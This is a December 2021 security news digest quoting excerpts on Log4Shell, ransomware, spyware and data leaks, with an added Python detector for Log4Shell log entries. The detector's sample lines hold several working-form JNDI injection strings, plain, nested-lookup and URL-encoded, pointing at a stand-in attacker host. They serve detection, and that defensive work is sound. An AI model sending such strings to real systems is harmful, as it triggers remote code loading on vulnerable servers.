December 17, 2021

Fortify Security Team

Title: Forcepoint Security News: Log4Shell Vulnerability, Pfizer Trade Secrets Exfiltration, Classifieds Site Leaked Personal Info via the F12 Key, and Hive Ransomware Enters Big League
Date Published: December 17, 2021

https://www.forcepoint.com/blog/x-labs/news-log4shell-pfizer-data-breach-hive-ransomware-gang

Excerpt: “The recently discovered Log4Shell vulnerability in the popular open source Log4j logging software lets an attacker gain access to a vulnerable system by sending a specially crafted text string to the system. That text string eventually gets logged by Log4j but is also interpreted as code to execute. This in turn is used to download malware and execute malware that can run cryptocurrency mining software, release sensitive data, be part of a DDoS attack on other systems, or execute ransomware. The exploit was first seen on sites hosting Minecraft servers, which discovered that attackers could trigger the vulnerability by posting chat messages.”
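The mechanism in the excerpt above (a logged string that Log4j evaluates as a ${jndi:...} lookup) is what defenders hunted for in web and application logs in the days after disclosure. The detector below is an added example written for this digest, not code from Forcepoint, Apache Log4j or any vendor named on this page; the log lines it scans are constructed and the attacker.example host is a placeholder. It undoes the two evasions that made naive grep rules miss payloads, URL encoding and nested lookups such as ${lower:j} or ${::-j}, which Log4j resolves innermost-first before the outer jndi lookup runs, and only then matches on the ${jndi:<scheme>: token.

```python
"""Log4Shell (CVE-2021-44228) payload detector for plain-text log lines.

Added example; not Forcepoint, Apache Log4j or vendor code. It unwinds
URL encoding and nested Log4j lookups before matching, so the obfuscated
forms seen in the wild resolve to the same ${jndi:...} string a scanner
can match. SAMPLE_LINES are constructed, not real traffic.
"""
import re
import urllib.parse

# Constructed Apache-style access log lines with the payload in the
# User-Agent or query string (typical injection points during the event).
SAMPLE_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] '
    '"GET /?x=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fa%7D HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:ldap://attacker.example/x}"',
]

# An innermost ${...} lookup: its body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What remains once evasions are unwound: ${jndi:<scheme>:...
_JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)
MAX_ROUNDS = 8  # bound the unwinding so hostile input cannot spin forever


def _resolve(m: re.Match) -> str:
    """Evaluate one innermost lookup the way Log4j 2.x does for the lookup
    types attackers use to hide the literal 'jndi' token. The jndi lookup
    itself and anything unrecognised are left untouched."""
    body = m.group(1)
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "jndi":
        return m.group(0)                 # this is the thing we want to see
    if sep and head.lower() == "lower":
        return rest.lower()               # ${lower:J} -> j
    if sep and head.lower() == "upper":
        return rest.upper()               # ${upper:j} -> J
    if ":-" in body:                      # ${name:-default}; ${::-j} -> j
        return body.split(":-", 1)[1]     # unknown name falls back to default
    return m.group(0)


def normalize(text: str) -> str:
    """URL-decode repeatedly, then collapse nested lookups until stable."""
    for _ in range(MAX_ROUNDS):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(MAX_ROUNDS):
        collapsed = _INNER.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(line: str) -> list:
    """JNDI schemes (ldap, rmi, dns, ...) found in one line after normalisation."""
    return [s.lower() for s in _JNDI.findall(normalize(line))]


def scan(lines) -> list:
    """Return (line number, scheme, normalised line) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        for scheme in _JNDI.findall(norm):
            hits.append((n, scheme.lower(), norm))
    return hits


if __name__ == "__main__":
    for n, scheme, norm in scan(SAMPLE_LINES):
        print(f"line {n}: jndi:{scheme} -> {norm}")
```

Detection of this kind is a compensating control, not a fix: a scanner only sees the encodings it knows how to unwind, and the real remediation is the Log4j upgrade the ZDNet excerpt further down this page describes, after which message lookups no longer reach JNDI at all.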

Title: Sainsbury’s Payroll Hit by Kronos Attack
Date Published: December 17, 2021

https://www.bbc.com/news/technology-59683889

Excerpt: “A UKG official told BBC News: “UKG recently became aware of a ransomware incident that has disrupted the Kronos Private Cloud, which houses solutions used by a limited number of our customers.” It had taken immediate action to investigate and mitigate the issue, alerted affected customers and informed the authorities. “We recognise the seriousness of the issue and have mobilised all available resources to support our customers and are working diligently to restore the affected services,” UKG added.”

Title: Facebook Exposes Mercenary Spy Firms That Targeted 50,000 People
Date Published: December 17, 2021

https://www.reuters.com/technology/facebook-exposes-mercenary-spy-firms-that-targeted-48000-people-2021-12-16/

Excerpt: “The company’s fight with the spy firms comes amid a wider move by American tech companies, U.S. lawmakers and President Joe Biden’s administration against purveyors of digital espionage services, notably the Israeli spyware company NSO Group, which was blacklisted earlier this month following weeks of revelations about how its technology was being deployed against civil society. Meta is already suing NSO in a U.S. court. Nathaniel Gleicher, Meta’s head of security policy, told Reuters that Thursday’s crackdown was meant to signal that “the surveillance-for-hire industry is much broader than one company”.”

Title: Backdoor Gives Hackers Complete Control over Federal Agency Network
Date Published: December 16, 2021

https://arstechnica.com/information-technology/2021/12/us-federal-agency-fails-to-respond-to-reports-it-has-been-backdoored/

Excerpt: “The backdoor works by replacing a normal Windows file named oci.dll with two malicious ones—one early in the attack and the other later on. The first imposter file implements WinDivert, a legitimate tool for capturing, modifying, or dropping network packets sent to or from the Windows network stack. The file allows the attackers to download and run malicious code on the infected system. Avast suspects the main purpose of the downloader is to bypass firewalls and network monitoring.”

Title: Google Unleashes Security ‘Fuzzer’ on log4shell Bug in Open-Source Software
Date Published: December 17, 2021

https://www.zdnet.com/article/google-unleashes-security-fuzzer-on-log4shell-bug-in-open-source-software/

Excerpt: “Log4j 2.16.0 disables access to JNDI by default and limits the default protocols to Java, LDAP and LDAPS. Disabling JNDI was previously a manual step to mitigate attacks against the original flaw. Most efforts are now focussed on vendors updating Log4j in their products and end-user organisations applying updates as they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies until 24 December to identify all applications affected by Log4Shell. Cisco, VMware, IBM and Oracle are busy developing patches for their affected products.”

Title: Android Malware Warning: Over 500,000 Users Have Been Infected after Downloading This App from Google Play
Date Published: December 17, 2021

https://www.zdnet.com/article/over-half-a-million-users-been-infected-with-joker-malware-after-downloading-this-android-app-from-google-play/

Excerpt: “Once installed, the malware does three things: it simulates clicks in order to generate revenue from malicious ads; subscribes users to unwanted paid premium services to steal money and commit billing fraud; and accesses users’ contact lists and sends the information to attackers. Researchers suggest there’s evidence that stolen information is sent to servers hosted in Russia. Negative reviews of the app on the Play Store suggest that some users have noticed the unauthorised behaviour, with complaints about being charged for services they didn’t request access to.”

Title: Gumtree Classifieds Site Leaked Personal Info via the F12 Key
Date Published: December 16, 2021

https://www.bleepingcomputer.com/news/security/gumtree-classifieds-site-leaked-personal-info-via-the-f12-key/

Excerpt: “The consequences of having such data exposed are significant, as the leaked users could be targeted by phishing or social engineering attacks that use this information to try and harvest more sensitive information. The site also features an API exclusively used by the Gumtree app on iOS. Unfortunately, one of that API’s endpoints was vulnerable to an IDOR (insecure direct object references) attack, resulting in another leak of full names and other account info.”

Title: This Company Was Hit With Ransomware, but Didn’t Have to Pay Up. Here’s How They Did It
Date Published: December 17, 2021

https://www.zdnet.com/article/this-company-was-hit-with-ransomware-but-didnt-have-to-pay-up-heres-how-they-did-it/

Excerpt: ““I was pretty confident about the data side of things – we use Rubrik. We make sure it’s got multi-factor authentication (MFA) on it and doesn’t have any shared credentials, so it’s a walled garden,” says Day. “These people immediately want to go after your backups because that ratchets up pressure, so if they can’t get to your backups, you’re in a good place.” But this didn’t stop the cyber criminals from attempting to extort a ransom payment – they emailed all the staff at Langs, claiming they’d stolen data and threatened to sell it on the dark web if a payment wasn’t received by a particular date.”

Title: New Pseudomanuscrypt Malware Infected over 35,000 Computers in 2021
Date Published: December 17, 2021

https://thehackernews.com/2021/12/new-pseudomanuscrypt-malware-infected.html

Excerpt: “The name comes from its similarities to the Manuscrypt malware, which is part of the Lazarus APT group’s attack toolset, Kaspersky researchers said, characterizing the operation as a “mass-scale spyware attack campaign.” The Russian cybersecurity company said it first detected the series of intrusions in June 2021. At least 7.2% of all computers attacked by the malware are part of industrial control systems (ICS) used by organizations in engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors that are located mainly in India, Vietnam, and Russia. Approximately a third (29.4%) of non-ICS computers are situated in Russia (10.1%), India (10%), and Brazil (9.3%).”

Title: NSW Government Casual Recruiter Suffers Ransomware Hit
Date Published: December 16, 2021

https://www.zdnet.com/article/nsw-government-casual-recruiter-suffers-ransomware-hit/

Excerpt: “IT recruitment firm Finite Recruitment has confirmed it experienced a cyber incident in October, which resulted in a “small subset” of the company’s data being downloaded and published on the dark web. The Finite Group incident response team confirmed with ZDNet that when the incident occurred, business operations were not disrupted. “Our security monitoring systems identified and closed down the threat quickly,” they said. “Since then, remedial works have been undertaken and the business has been fully operational”.”
